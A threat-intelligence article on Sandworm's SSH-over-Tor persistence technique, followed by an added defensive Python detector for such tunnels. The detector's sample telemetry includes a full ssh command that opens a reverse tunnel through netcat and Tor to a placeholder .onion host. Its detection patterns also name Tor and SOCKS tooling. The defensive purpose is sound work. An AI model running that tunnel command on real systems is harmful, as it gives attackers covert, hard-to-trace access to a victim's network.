Sandworm, a state-sponsored threat group also tracked as FROZENBARENTS, has adopted SSH-over-Tor tunneling to maintain long-term, covert access to targeted networks. The technique lets the group keep a foothold for extended periods while exposing no infrastructure of its own to the victim's network logs. Sandworm has been active since at least 2014 and is known for targeting government bodies, energy firms, and research institutions, primarily for intelligence collection.
The attack typically begins with spear-phishing to gain initial access. Once inside, Sandworm starts an SSH client on the compromised host and routes it through a local Tor client, so the session terminates at an onion service operated by the group rather than at an addressable server. Because the only outbound connections the host makes are to Tor entry relays, there is no attacker IP address for defenders to block, geolocate, or attribute, and the tunnel can be re-established indefinitely without changing infrastructure.
SSH-over-Tor tunneling combines the two protocols in distinct roles. SSH supplies an authenticated, encrypted channel and, through its reverse-forwarding feature, lets the operator reach listeners on the victim host over a connection the victim initiated, which is what makes it a persistence mechanism rather than just an interactive shell. Tor supplies anonymity: the victim-side traffic reveals only Tor relay addresses, and the onion service address says nothing about where the operator is. The practical consequence for defenders is that the SSH session itself is invisible to network inspection, but the Tor traffic carrying it is not. Connections to published Tor relays, or a Tor client binary running on a host that has no business running one, remain observable, and these are the signals to hunt for.
The impact of this new tactic is significant, as it allows Sandworm to conduct prolonged espionage operations without detection. Organizations in the targeted sectors face increased risks of data breaches and intelligence theft, which can have severe consequences for national security and business operations.
To counter this threat, organizations should instrument the points where SSH-over-Tor is still visible: alert on outbound connections to known Tor relay and bridge addresses from the network edge, inventory and alert on Tor client binaries (including renamed copies identified by their relay traffic) on endpoints, and baseline SSH client usage so that sessions with a SOCKS ProxyCommand, an .onion destination, or a reverse forward (-R) from user workstations stand out. Enforcing egress through an authenticated proxy removes the direct path to Tor entirely. These controls complement, rather than replace, the basics: intrusion detection systems, regular security audits, and training employees to recognize the spear-phishing attempts that give Sandworm its initial foothold.
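The following is an added example, not code from the original article or from any vendor it cites, showing how the two detection handles described above (the SSH client invocation on L3 and the Tor traffic and binaries on L5) can be turned into correlated host-level findings. It runs over constructed process-creation and network-connection events in the shape an EDR, Sysmon or auditd would produce; the relay addresses are placeholders from the TEST-NET ranges and are not real Tor relays, and the SOCKS ports, ORPorts, image names and rule names are assumptions chosen for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Reference data, constructed for this example. The relay addresses come from
# the TEST-NET documentation ranges and are NOT real Tor relays; a production
# detector would load the current Tor consensus (or a vetted guard/relay feed).
TOR_RELAY_IPS = {"192.0.2.10", "192.0.2.11", "198.51.100.7"}
TOR_OR_PORTS = {443, 9001, 9030}            # usual ORPort/DirPort values
TOR_IMAGES = {"tor", "tor.exe", "obfs4proxy", "lyrebird", "snowflake-client"}
SOCKS_WRAPPERS = {"torsocks", "proxychains", "proxychains4"}
SSH_IMAGES = {"ssh", "ssh.exe", "plink.exe"}

ONION_RE = re.compile(r"\b[a-z2-7]{16}(?:[a-z2-7]{40})?\.onion\b", re.I)   # v2 or v3 address
LOCAL_SOCKS_RE = re.compile(r"(?:127\.0\.0\.1|localhost):(?:9050|9150)\b")  # default tor SOCKS ports
REVERSE_FWD_RE = re.compile(r"\s-R\s*\S+")                                   # ssh -R remote forward


@dataclass(frozen=True)
class ProcEvent:          # process creation (Sysmon EID 1, auditd execve, EDR telemetry)
    host: str
    pid: int
    image: str            # executable basename
    cmdline: str


@dataclass(frozen=True)
class NetEvent:           # outbound TCP connect (Sysmon EID 3, Zeek conn.log joined to a pid)
    host: str
    pid: int
    image: str
    dst_ip: str
    dst_port: int


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    detail: str


def check_process(ev: ProcEvent) -> List[Finding]:
    """Flag Tor client binaries and SSH sessions that are routed through Tor."""
    found = []
    if ev.image in TOR_IMAGES:
        found.append(Finding(ev.host, "tor_client_running", "medium", f"{ev.image} pid={ev.pid}"))
    tokens = ev.cmdline.split()
    is_ssh = ev.image in SSH_IMAGES or any(t in SSH_IMAGES for t in tokens[:3])
    via_tor = bool(ONION_RE.search(ev.cmdline) or LOCAL_SOCKS_RE.search(ev.cmdline)
                   or (tokens and tokens[0] in SOCKS_WRAPPERS))
    if is_ssh and via_tor:
        if REVERSE_FWD_RE.search(ev.cmdline):
            # -R publishes a listener on the far side: inbound access riding an outbound
            # Tor circuit, surviving NAT and ingress filtering. This is the persistence primitive.
            found.append(Finding(ev.host, "ssh_reverse_tunnel_over_tor", "critical", ev.cmdline))
        else:
            found.append(Finding(ev.host, "ssh_over_tor", "high", ev.cmdline))
    return found


def check_network(ev: NetEvent) -> List[Finding]:
    """Flag connections to known relay IPs on ORPorts; a non-Tor image doing so
    suggests a renamed or embedded Tor client."""
    if ev.dst_ip in TOR_RELAY_IPS and ev.dst_port in TOR_OR_PORTS:
        if ev.image in TOR_IMAGES:
            return [Finding(ev.host, "tor_relay_connection", "medium",
                            f"{ev.image} -> {ev.dst_ip}:{ev.dst_port}")]
        return [Finding(ev.host, "tor_relay_connection_unexpected_image", "high",
                        f"{ev.image} pid={ev.pid} -> {ev.dst_ip}:{ev.dst_port}")]
    return []


def correlate(findings: Iterable[Finding]) -> Dict[str, str]:
    """Per-host verdict: an SSH-over-Tor process plus independent evidence of Tor
    traffic is treated as a confirmed tunnel; either alone is only a lead."""
    rules = defaultdict(set)
    for f in findings:
        rules[f.host].add(f.rule)
    verdicts = {}
    for host, seen in rules.items():
        ssh = any(r.startswith("ssh_") for r in seen)
        tor = any(r.startswith("tor_") for r in seen)
        verdicts[host] = "confirmed ssh-over-tor tunnel" if ssh and tor else "investigate"
    return verdicts


def analyse(procs, nets):
    findings = [f for ev in procs for f in check_process(ev)]
    findings += [f for ev in nets for f in check_network(ev)]
    return findings, correlate(findings)


# Constructed telemetry for three hosts (not real logs).
ONION = "abcdefghijklmnopqrstuvwxyz234567abcdefghijklmnopqrstuvwx.onion"
SAMPLE_PROCS = [
    ProcEvent("ws-17", 4120, "tor.exe", r"C:\Users\Public\tor.exe -f torrc"),
    ProcEvent("ws-17", 4133, "ssh.exe",
              f'ssh -o ProxyCommand="nc -X 5 -x 127.0.0.1:9050 %h %p" -N -R 2222:127.0.0.1:22 svc@{ONION}'),
    ProcEvent("ws-03", 2210, "ssh", "ssh -L 8080:intranet:80 admin@10.0.0.5"),   # ordinary admin use
    ProcEvent("ws-22", 900, "updater.exe", r"C:\ProgramData\upd\updater.exe --daemon"),
]
SAMPLE_NETS = [
    NetEvent("ws-17", 4120, "tor.exe", "192.0.2.10", 9001),
    NetEvent("ws-03", 2210, "ssh", "10.0.0.5", 22),
    NetEvent("ws-22", 900, "updater.exe", "198.51.100.7", 443),   # relay contact by a non-Tor image
]

if __name__ == "__main__":
    findings, verdicts = analyse(SAMPLE_PROCS, SAMPLE_NETS)
    for f in findings:
        print(f"[{f.severity:8}] {f.host} {f.rule}: {f.detail}")
    for host, verdict in verdicts.items():
        print(f"{host}: {verdict}")
```

Note the two design choices. First, a reverse forward on its own is not flagged, because administrators use -R legitimately; it is only escalated when the same invocation also points at a SOCKS port, an .onion host or a Tor wrapper. Second, relay contact from an image that is not a known Tor client is rated higher than contact from tor.exe itself, since the former is what a renamed or statically embedded Tor client looks like in telemetry. Bridges with pluggable transports will not appear in a relay list, so the process-side rules are the backstop when the network-side rule is blind.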
Source: https://gbhackers.com/ssh-over-tor-tunnel/